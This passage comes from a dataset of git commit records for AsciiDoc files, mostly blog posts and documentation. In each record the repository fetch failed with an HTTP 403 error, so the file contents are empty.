Recording Your Voice","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-03-Google-Has-Been-Recording-Your-Voice.adoc","new_file":"_posts\/2016-06-03-Google-Has-Been-Recording-Your-Voice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3301f9b872ef76440c3f8e7d1387ad0504f9fc63","subject":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","message":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2cc72ce6ab40f6586c15db0963bbc987ab9fc23","subject":"y2b create post Anki DRIVE Unboxing (Feat. Will)","message":"y2b create post Anki DRIVE Unboxing (Feat. Will)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-13-Anki-DRIVE-Unboxing-Feat-Will.adoc","new_file":"_posts\/2014-07-13-Anki-DRIVE-Unboxing-Feat-Will.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddaee0d158d987348509526894144e0835667fa5","subject":"Update 2017-05-12-picture-book.adoc","message":"Update 2017-05-12-picture-book.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-12-picture-book.adoc","new_file":"_posts\/2017-05-12-picture-book.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2092bc9a37174379197044dc761d1bebcef4252e","subject":"Update 2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","message":"Update 2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","new_file":"_posts\/2013-12-07-Eclipse-comment-creer-et-utiliser-des-templates-de-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02315d149c8160fb007a1387297f7fcf614eac20","subject":"Delete the file at '_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","message":"Delete the file at '_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_file":"_posts\/2018-07-18-Doctrine-Second-Level-Cache-with-Translations-and-Redis.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f56a92e6d203c9e911a665880f84ce72186a139","subject":"Added Windows Google Drive client artifacts.","message":"Added Windows Google Drive client artifacts.\n","repos":"pidydx\/artifacts,destijl\/artifacts,destijl\/artifacts,sebastianwelsh\/artifacts,sebastianwelsh\/artifacts,pidydx\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pidydx\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9d81380f631fb5e8e1dc646e4e97e72c4b1c62db","subject":"Update 2016-08-09-TP.adoc","message":"Update 2016-08-09-TP.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-08-09-TP.adoc","new_file":"_posts\/2016-08-09-TP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c28079098495f9c58cccaeed732186c2fdbbc349","subject":"Update 2015-06-10-NodeJS-Event-Loop.adoc","message":"Update 2015-06-10-NodeJS-Event-Loop.adoc","repos":"ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io,ragingsmurf\/ragingsmurf.github.io","old_file":"_posts\/2015-06-10-NodeJS-Event-Loop.adoc","new_file":"_posts\/2015-06-10-NodeJS-Event-Loop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ragingsmurf\/ragingsmurf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"106efcb66e2576c8c16dee551c177c247bb34a33","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b98c1356f7f8d86a6422e37b11032c8db5c64a7","subject":"update link to APM Server 6.5 schema definition (#331)","message":"update link to APM Server 6.5 schema definition (#331)\n\n* update link to APM Server 6.5 schema definition\r\n\r\n* update anchor to schema links\r\n\r\nCo-Authored-By: beniwohli <8a85c06c4eba8aba733a4be991bd4b4c6b4e4581@piquadrat.ch>\r\n","repos":"beniwohli\/apm-agent-python,beniwohli\/apm-agent-python,beniwohli\/apm-agent-python,beniwohli\/apm-agent-python","old_file":"docs\/api.asciidoc","new_file":"docs\/api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beniwohli\/apm-agent-python.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"ccb1b205c2718543219c7db10785739c8e6de682","subject":"y2b create post DON'T Buy The iPhone X","message":"y2b create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-26-DONTBuyTheiPhoneX.adoc","new_file":"_posts\/2017-11-26-DONTBuyTheiPhoneX.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"efb386af52ad6eb7fd89deaa4c706fde5442369c","subject":"Create neo4j-330-what-you-dont-know.adoc","message":"Create neo4j-330-what-you-dont-know.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/neo4j-330-what-you-dont-know.adoc","new_file":"_posts\/neo4j-330-what-you-dont-know.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17acdf8b50606922d92bbb833a79a4c692ce14af","subject":"y2b create post 128GB iPad Giveaway!","message":"y2b create post 128GB iPad Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-02-21-128GB-iPad-Giveaway.adoc","new_file":"_posts\/2013-02-21-128GB-iPad-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f75ccb84398fbbdcf87cf8e878d2ee9fb9b6b14","subject":"Update 2016-08-19-laravel-with-pusher.adoc","message":"Update 2016-08-19-laravel-with-pusher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_file":"_posts\/2016-08-19-laravel-with-pusher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba52cd467d4587a595939c7346adeef6a2b6c21","subject":"y2b create post 5 Cool Gadgets Under $10","message":"y2b create post 5 Cool Gadgets Under $10","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-21-5CoolGadgetsUnder10.adoc","new_file":"_posts\/2018-01-21-5CoolGadgetsUnder10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a5bf1dfeba1d46ba0bb0d0f81fb51d7295367669","subject":"Update 2016-12-23-Larastudy.adoc","message":"Update 2016-12-23-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-23-Larastudy.adoc","new_file":"_posts\/2016-12-23-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c7f28625c23a9d79ea64caec76ac18db7b08b66","subject":"spelling fix, more storage reinforcements","message":"spelling fix, more storage reinforcements\n\nSigned-off-by: Dan Mack <f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"workhist.adoc","new_file":"workhist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a0bfd3b7419e9f59f1ba53a4239c02bd237b0de","subject":"Create Deeper\/test3.adoc","message":"Create Deeper\/test3.adoc","repos":"JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook,JClingo\/gitbook","old_file":"Deeper\/test3.adoc","new_file":"Deeper\/test3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JClingo\/gitbook.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"84eed7e1b4846f1fca75efba605bba6d2466345c","subject":"gdb: updates notes","message":"gdb: updates notes\n","repos":"vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam,vmiklos\/vmexam","old_file":"gdb\/tui.adoc","new_file":"gdb\/tui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vmiklos\/vmexam.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8bf33e8a70629cd0e393990820650be5ef74de4","subject":"Create Yaml-Spec.adoc","message":"Create Yaml-Spec.adoc","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"Yaml-Spec.adoc","new_file":"Yaml-Spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23626f4ce09b8497b75271a61b36b3a1451c2582","subject":"asciidoc conversion (fingers crossed)","message":"asciidoc conversion (fingers crossed)\n","repos":"t-bullock\/kassia","old_file":"org\/neume_names.adoc","new_file":"org\/neume_names.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/t-bullock\/kassia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b35802f39c3db9ae9c909c56ca6611aabc799b","subject":"Update 2017-03-14-Git-shows-everything-as-modified-Fix.adoc","message":"Update 2017-03-14-Git-shows-everything-as-modified-Fix.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-14-Git-shows-everything-as-modified-Fix.adoc","new_file":"_posts\/2017-03-14-Git-shows-everything-as-modified-Fix.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ae7445e73970381423d957e30fe1b370b711d5b","subject":"y2b create post Does It Suck? - Fully Wireless Earbuds","message":"y2b create post Does It Suck? - Fully Wireless Earbuds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-07-Does-It-Suck--Fully-Wireless-Earbuds.adoc","new_file":"_posts\/2015-10-07-Does-It-Suck--Fully-Wireless-Earbuds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b35d557aae89ff8e49c794eedc3bb6dd2d9fd260","subject":"Update 2016-04-11-Being-Switzerland-Has-Its-Advantages.adoc","message":"Update 2016-04-11-Being-Switzerland-Has-Its-Advantages.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2016-04-11-Being-Switzerland-Has-Its-Advantages.adoc","new_file":"_posts\/2016-04-11-Being-Switzerland-Has-Its-Advantages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"268889406a46cc9e4ec526c97deb2b66eed3add9","subject":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-with-AngularJS.adoc","message":"Update 2017-10-20-Trigger-click-when-determinate-requests-finish-with-AngularJS.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-with-AngularJS.adoc","new_file":"_posts\/2017-10-20-Trigger-click-when-determinate-requests-finish-with-AngularJS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"435161471962b034b3dbdf0d49792eab3c3a70ae","subject":"fixes: #72 add documentation about howto run the TCK","message":"fixes: #72 add documentation about howto run the TCK\n\nSigned-off-by: Mark Struberg <cad1b27282558550bbb26ff7c60fbe7687c90763@apache.org>\n","repos":"microprofile\/microprofile-config,jmesnil\/microprofile-config,OndrejM\/microprofile-config,OndrejM\/microprofile-config,heiko-braun\/microprofile-health","old_file":"tck\/running_the_tck.asciidoc","new_file":"tck\/running_the_tck.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heiko-braun\/microprofile-health.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e40f34bc958bc7613f3c09307eb33cf5865a2b9","subject":"Deleted _posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","message":"Deleted _posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e71f420f1c80922bce27b5ec942db497dce1bb9b","subject":"Add lab03 task","message":"Add lab03 task\n","repos":"slbedu\/javase8-2016","old_file":"lab03\/README.adoc","new_file":"lab03\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/slbedu\/javase8-2016.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac14a4d9ab2003914514d8d5fd415b30f28be166","subject":"Forge 3.2.0.Final","message":"Forge 3.2.0.Final\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-05-13-forge-3.2.0.final.asciidoc","new_file":"news\/2016-05-13-forge-3.2.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ea4180aed965dffa70cd4567e83184324940e8a0","subject":"Update 2016-04-03-Maya-Linear-Workflow-vs-Texture-Gamma.adoc","message":"Update 2016-04-03-Maya-Linear-Workflow-vs-Texture-Gamma.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-04-03-Maya-Linear-Workflow-vs-Texture-Gamma.adoc","new_file":"_posts\/2016-04-03-Maya-Linear-Workflow-vs-Texture-Gamma.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"387739da7a1f95f246e9f9d3198f0dc3c8e470a9","subject":"Update 2016-05-05-Migrating-a-dynamic-webpage-to-static.adoc","message":"Update 2016-05-05-Migrating-a-dynamic-webpage-to-static.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2016-05-05-Migrating-a-dynamic-webpage-to-static.adoc","new_file":"_posts\/2016-05-05-Migrating-a-dynamic-webpage-to-static.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf1277dbdbbf86b071925df1d4855de96dfd5bd2","subject":"Update 2017-02-16-Regex-Possessive-quantifiers-wildcard.adoc","message":"Update 2017-02-16-Regex-Possessive-quantifiers-wildcard.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-02-16-Regex-Possessive-quantifiers-wildcard.adoc","new_file":"_posts\/2017-02-16-Regex-Possessive-quantifiers-wildcard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1266526d8c56ab3b81ae94851bcecd0481a5145b","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510c6d6226d0beb5f856e0ab03609c7e548611ac","subject":"Update 2016-01-13-Title.adoc","message":"Update 2016-01-13-Title.adoc","repos":"studiocardo\/studiocardo.github.io,studiocardo\/studiocardo.github.io,studiocardo\/studiocardo.github.io","old_file":"_posts\/2016-01-13-Title.adoc","new_file":"_posts\/2016-01-13-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/studiocardo\/studiocardo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f20286c621bfa62dafd3d28caaa48b93acea06e2","subject":"Update 2017-03-13-Teste.adoc","message":"Update 2017-03-13-Teste.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2017-03-13-Teste.adoc","new_file":"_posts\/2017-03-13-Teste.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dd3d82ca4b0c2856a40041f5b4b66f9c5ee498c","subject":"Update 2017-10-15-Hello-Github-World.adoc","message":"Update 2017-10-15-Hello-Github-World.adoc","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-10-15-Hello-Github-World.adoc","new_file":"_posts\/2017-10-15-Hello-Github-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5def54d0be33e6cf4956d7c64305fe2ac873e023","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f281616adf71094fdf18980926000a331b60dfbf","subject":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","message":"Update 2018-10-15-N-E-M-A-P-I-Docker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_file":"_posts\/2018-10-15-N-E-M-A-P-I-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76b4229973f8ba88dfc8fb194932bc8e03df16dc","subject":"updated change log","message":"updated change log\n","repos":"BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,jorgebay\/tinkerpop,samiunn\/incubator-tinkerpop,newkek\/incubator-tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,krlohnes\/tinkerpop,newkek\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,newkek\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop","old_file":"CHANGELOG.asciidoc","new_file":"CHANGELOG.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f97236b61e0a868dba49a7892bf0cb8ac97c1def","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a6b8b282c4939ce65507aaad6aee83b317df88f3","subject":"Update 2016-12-06-problem-solving-algoritm-basic.adoc","message":"Update 2016-12-06-problem-solving-algoritm-basic.adoc","repos":"qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io,qeist\/qeist.github.io","old_file":"_posts\/2016-12-06-problem-solving-algoritm-basic.adoc","new_file":"_posts\/2016-12-06-problem-solving-algoritm-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qeist\/qeist.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0bd9e91d333a06dd11eb5335d67da3fb41dea5","subject":"y2b create post DON'T Buy The iPhone X","message":"y2b create post DON'T Buy The iPhone X","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-11-26-DON'T%20Buy%20The%20iPhone%20X.adoc","new_file":"_posts\/2017-11-26-DON'T%20Buy%20The%20iPhone%20X.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"803fbb82b7607b90b1032e724cf008bab0cef22b","subject":"Update 2020-03-19-my-thoughts-2.adoc","message":"Update 2020-03-19-my-thoughts-2.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-03-19-my-thoughts-2.adoc","new_file":"_posts\/2020-03-19-my-thoughts-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12a2db541785488f90990fa67f5c62b257a9f4a7","subject":"Fix typo in docs","message":"Fix typo in 